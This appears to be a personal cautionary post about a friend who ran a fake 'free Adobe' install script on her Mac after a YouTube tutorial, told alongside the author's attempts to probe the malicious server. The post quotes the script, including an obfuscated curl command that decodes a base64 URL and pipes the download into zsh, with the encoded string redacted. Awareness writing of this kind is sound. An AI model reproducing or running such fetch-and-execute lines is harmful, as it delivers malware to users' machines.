On the way home from the office that day, my friend messaged me: "I think I accidentally ran a bad script."
My friend isn't a teach person so script syntax, terminal commands, all of that is pretty foreign to them. I knew this was probably a no-brainer-run-everything situation. I did a quick interview to figure out how it even happened.
Turns out it was my friend's first time on a Mac and she wanted to install Adobe (the free version, please don't do this 🙃). She found a YouTube tutorial that walked her through it: run a script, and boom, Adobe installed.
I asked for the channel. Everything about it screamed sus🙃. The video was 30 seconds long and uploaded only 5 days ago. And then I asked for the script.
echo "GitLink: https://gitsabode.com/the-rest-of-the-url.dmg" &&
curl -s $(echo 'someString' | openssl base64 -d -A) | zshThe script prints a fake download progress as if it's pulling something from Adobe's website (which clearly not), while in reality, it's curling a malicious URL in the background.
My friend said the script ran for about 10 minutes and nothing seemed to happen. There were a few permission prompts for things she didn't really think about, but when it asked for Finder on the second or third prompt, that's when she got suspicious and finally killed the process (thank God, she stopped!). I was curious about what actually would've happened if she let it finish. So I decoded the URL string and tried opening it in a browser, but It was down. Then I "cleaned" my laptop, set up Tor, and accessed it (curl -I) with different user agents. Apparently, the server was returning 520 only to browsers and most tools, while only responding "properly" to curl. But by the time I tried, even curl was getting 404. The decoded URL looked like something.com/curl/[long-hash]. My guess is the hash was a one time identifier so once her machine fetched it, the hash got marked as delivered and anyone hitting that same URL afterward gets a 404.
All I can say is, stay curious, stay paranoid. Install software from the actual vendor. And maybe… with AI everywhere today, a quick double check could save you a lot of trouble^^.
As for my friend, I told her to disconnect from the internet immediately that time and change all her passwords. Hopefully everything's fine.